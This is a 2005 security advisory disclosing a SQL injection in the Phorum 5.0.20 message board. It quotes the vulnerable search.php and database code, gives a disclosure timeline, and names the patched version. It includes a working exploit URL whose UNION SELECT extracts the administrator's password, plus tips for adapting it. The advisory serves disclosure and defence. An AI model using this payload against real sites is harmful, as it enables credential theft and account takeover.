waraxe-2005-SA043.txt

`{================================================================================}  
{ [waraxe-2005-SA#043] }  
{================================================================================}  
{ }  
{ [ Sql injection in Phorum 5.0.20 and earlier ] }  
{ }  
{================================================================================}  
  
Author: Janek Vind "waraxe"  
Date: 04. November 2005  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-43.html  
  
  
Target software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Phorum 5.0.20  
  
Homepage: http://phorum.org/  
  
  
What is Phorum?  
Phorum is a web based message board written in PHP.  
Phorum is designed with high-availability and visitor ease  
of use in mind. Features such as mailing list integration,  
easy customization and simple installation make Phorum a  
powerful add-in to any website.  
  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Critical sql injection has been found in Phorum 5.0.0.alpha  
to 5.0.20. Phorum 5.1.x branch (in alpha stage) seems to be unaffected.  
  
  
Details  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Problem lies in uninitialized array "$forum_ids" in "search.php" file.  
>From source code:  
  
----------------[ from source code ]------------------  
$forum_ids[$row["forum_id"]] = $row["forum_id"];  
  
$match_number++;  
}  
  
$forums = phorum_db_get_forums($forum_ids);  
  
foreach($arr["rows"] as $key => $row){  
$arr["rows"][$key]["forum_url"] =  
phorum_get_url(PHORUM_LIST_URL, $row["forum_id"]);  
$arr["rows"][$key]["forum_name"] =  
$forums[$row["forum_id"]]["name"];  
}  
----------------[ /from source code ]-----------------  
  
This can give as possibilities to "inject" arbitrary data to "$forum_ids"  
array by GPC and next let's look at "phorum_db_get_forums()" function from   
"include/db/mysql.php" :  
  
----------------[ from source code ]------------------  
if (is_array($forum_ids)) $forum_ids = implode(",", $forum_ids);  
  
$sql = "select * from {$PHORUM['forums_table']} ";  
if ($forum_ids){  
$sql .= " where forum_id in ($forum_ids)";  
} elseif (func_num_args() > 1) {  
$sql .= " where parent_id = $parent_id";  
if(!defined("PHORUM_ADMIN")) $sql.=" and active=1";  
}  
  
$sql .= " order by display_order ASC, name";  
  
$res = mysql_query($sql, $conn);  
if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql");  
  
----------------[ /from source code ]-----------------  
  
So sql query manipulation seems to be possible. Now let's try this  
in real world ...  
  
[------ real life exploit ------]  
  
http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL,  
match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)  
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,  
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users  
/**/WHERE/**/admin=1/**/LIMIT/**/1/*  
  
There are some critical conditions for exploit to be successful.  
  
1. "register_globals" must be "on", so we can poison php variable space  
through GPC.  
  
2. "search=a" - this search string must return one or more results.  
  
3. "SELECT/**/1,password" - first number in sql injection, in our case "1",  
must be "forum_id" for forum in search results.  
  
4. sql table prefix "phorum_" can be different, but this will give nice sql error  
messages and reveal real prefix.  
  
5. Some Phorum versions seems to have different table structure for "phorum_users",  
so again, there will be sql error messages. It's easy to overcome this kind of  
problem by altering sql injection string as "trial/error".  
  
[----- /real life exploit ------]  
  
  
See ya and have a nice day ;)  
  
  
Disclosure timeline:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
01. november 2005 - vendor first contacted  
01. november 2005 - vendor response  
02. november 2005 - details emailed to vendor  
03. november 2005 - vendor released new, patched version  
04. november 2005 - public advisory released  
  
  
How to fix:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Download new Phorum version 5.0.21 from:  
  
http://phorum.org/downloads/phorum-5.0.21.tar.gz  
  
More info: http://phorum.org/story.php?57  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to LINUX, Heintz, murdock, g0df4th3r, slimjim100, shai-tan,  
y3dips and all other active members from waraxe community !  
  
Tervitused - Raido Kerna !  
  
  
Additional resources:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
DX expedition database - http://www.dxdb.com/  
  
Hard disc recovery - http://www.hdd911.com/  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
Homepage: http://www.waraxe.us/  
  
---------------------------------- [ EOF ] ------------------------------------  
`